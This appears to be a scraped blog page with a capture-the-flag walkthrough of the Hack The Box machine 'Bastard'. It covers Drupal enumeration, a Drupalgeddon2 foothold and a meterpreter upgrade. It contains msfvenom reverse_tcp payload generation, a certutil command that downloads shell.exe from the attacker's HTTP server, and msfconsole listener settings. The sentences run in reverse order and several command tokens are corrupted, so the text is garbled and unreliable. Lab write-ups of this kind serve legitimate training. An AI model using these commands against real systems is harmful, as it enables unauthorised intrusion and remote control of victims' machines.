![]() ![]()
Then using that PrivEsc vector we will exploit, to get admin privilege shell. To escalate the privilege to admin we have to first find a privilege escalation vector. Meterpreter > cat 'C:\Users\dimitris\Desktop\user.txt' Privilege Escalation Now we have many options to play with our meterpreter shell. We have successfully upgraded our shell to meterpreter shell. Msf5 exploit(multi/handler) > set LPORT 4321 Msf5 exploit(multi/handler) > set LHOST 10.10.14.8 Msf5 exploit(multi/handler) > set PAYLOAD windows/圆4/meterpreter/reverse_tcp Started the listener on msfconsole to get the reverse shell back $ python3 -m rver 80 //Start python http server to host this shell.exe fileĭrupalgeddon2>certutil.exe -urlcache -split -f "" shell.exe# This will download the payload to bastard machine. #Meterpreter explit suggester Pc$ msfvenom -p windows/圆4/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=4321 -f exe>shell.exe # This will create an exe payload on our local PC So, I upgraded the shell to meterpreter shell by dropping a payload created through msfvenom, into bastard machine and then getting meterpreter shellback on my listener in msfconsole. Right now, we are in a fake cmd shell, which has limited functionality, and we cannot capture user flag because this shell restricts the execution of typecommand. We got a user shell by the user named iusr. #Meterpreter explit suggester installTherefore, to solve this problem you have to install this gem using the command $sudo gem install highline This error is due to a missing a gem named highline, in your gem directory. Note: If you get error as shown in the screenshot. ![]() ![]() Ongoing to URL found that the installed version is 7.54. After some googling, found this answer from stackoverflow. For filtering the most appropriate one, I had to know the exact version of the Drupal, which is running on port 80. However, the problem is that, there are many numbers of exploits and we do not know which exploit will surely work. Searchsploit listed many number of potential exploits. #Meterpreter explit suggester softwareSoon I get any software and its version then immediately I search for public exploit using searchsploit. Nmap script http-generator revealed that the website is made up of Drupal CMS and its version is 7. Microsoft IIS 7 web server on port 80, Microsoft RPC service on port 135
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |